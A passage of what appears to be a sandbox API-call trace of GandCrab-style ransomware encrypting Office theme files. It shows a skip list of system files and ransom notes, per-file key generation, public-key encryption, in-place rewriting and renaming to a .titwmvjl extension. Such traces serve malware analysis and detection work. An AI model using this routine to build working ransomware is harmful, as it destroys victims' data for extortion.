lpString2="bootsect.bak") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="boot.ini") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="ntuser.dat.log") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="thumbs.db") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="ntldr") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="NTDETECT.COM") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="Bootfont.bin") returned 1 [0077.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0077.306] lstrlenW (lpString=".thmx") returned 5 [0077.306] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.306] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0077.306] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.307] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.307] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001103[[fn=headlines]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0077.307] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.307] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0077.323] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.323] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.323] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.323] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.323] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.324] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.324] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0077.324] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.324] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.324] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.324] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.324] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.324] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.325] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.325] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.325] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0077.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.325] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.325] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.325] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.326] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.326] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0077.326] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.326] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.326] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.326] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.326] GetLastError () returned 0x0 [0077.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.327] CryptDestroyKey (hKey=0x503738) returned 1 [0077.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.327] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.327] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.328] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503278) returned 1 [0077.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.328] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.328] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.328] GetLastError () returned 0x0 [0077.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.329] CryptDestroyKey (hKey=0x503278) returned 1 [0077.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.329] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.329] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0077.329] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0077.329] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x83bd9, lpOverlapped=0x0) returned 1 [0077.366] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff7c427, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.366] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x83bd9, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x83bd9, lpOverlapped=0x0) returned 1 [0077.382] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.382] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0077.383] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.387] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.389] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.389] CloseHandle (hObject=0x2ec) returned 1 [0077.397] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001103[[fn=headlines]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001103[[fn=headlines]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0077.399] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.399] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0077.399] lstrcmpW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2=".") returned 1 [0077.399] lstrcmpW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="..") returned 1 [0077.399] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001104[[fn=Feathered]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx" [0077.399] lstrlenW (lpString=".titwmvjl") returned 9 [0077.399] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0077.399] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0077.399] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx.titwmvjl") returned 142 [0077.399] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0077.399] lstrlenW (lpString=".thmx") returned 5 [0077.399] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.400] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0077.400] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0077.400] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0077.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="desktop.ini") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="autorun.inf") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="ntuser.dat") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="iconcache.db") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="bootsect.bak") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="boot.ini") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="ntuser.dat.log") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="thumbs.db") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="ntldr") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="NTDETECT.COM") returned 1 [0077.400] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="Bootfont.bin") returned 1 [0077.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0077.401] lstrlenW (lpString=".thmx") returned 5 [0077.401] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.401] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0077.401] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.401] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.401] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001104[[fn=feathered]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0077.402] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.402] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0077.413] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.413] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.413] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.414] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.414] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.414] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.414] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0077.414] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.415] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.415] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.415] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.415] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.415] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.416] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.416] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.416] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0077.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.416] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.416] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.417] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.417] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034b8) returned 1 [0077.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.417] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.418] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.418] GetLastError () returned 0x0 [0077.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.418] CryptDestroyKey (hKey=0x5034b8) returned 1 [0077.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.418] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.419] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.419] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0077.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.420] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.420] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.420] GetLastError () returned 0x0 [0077.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.420] CryptDestroyKey (hKey=0x503738) returned 1 [0077.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.421] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.421] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0077.421] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0077.421] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0077.469] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.469] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0077.484] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.484] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0077.486] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.490] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.494] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.494] CloseHandle (hObject=0x2ec) returned 1 [0077.527] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001104[[fn=feathered]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001104[[fn=feathered]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0077.528] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.528] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0077.528] lstrcmpW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2=".") returned 1 [0077.528] lstrcmpW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="..") returned 1 [0077.528] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001105[[fn=Crop]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx" [0077.528] lstrlenW (lpString=".titwmvjl") returned 9 [0077.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0077.528] VirtualAlloc (lpAddress=0x0, dwSize=0x140, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0077.529] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx.titwmvjl") returned 137 [0077.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0077.529] lstrlenW (lpString=".thmx") returned 5 [0077.529] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.529] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0077.529] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0077.529] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0077.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="desktop.ini") returned 1 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="autorun.inf") returned 1 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="ntuser.dat") returned 1 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="iconcache.db") returned 1 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="bootsect.bak") returned 1 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="boot.ini") returned 1 [0077.529] 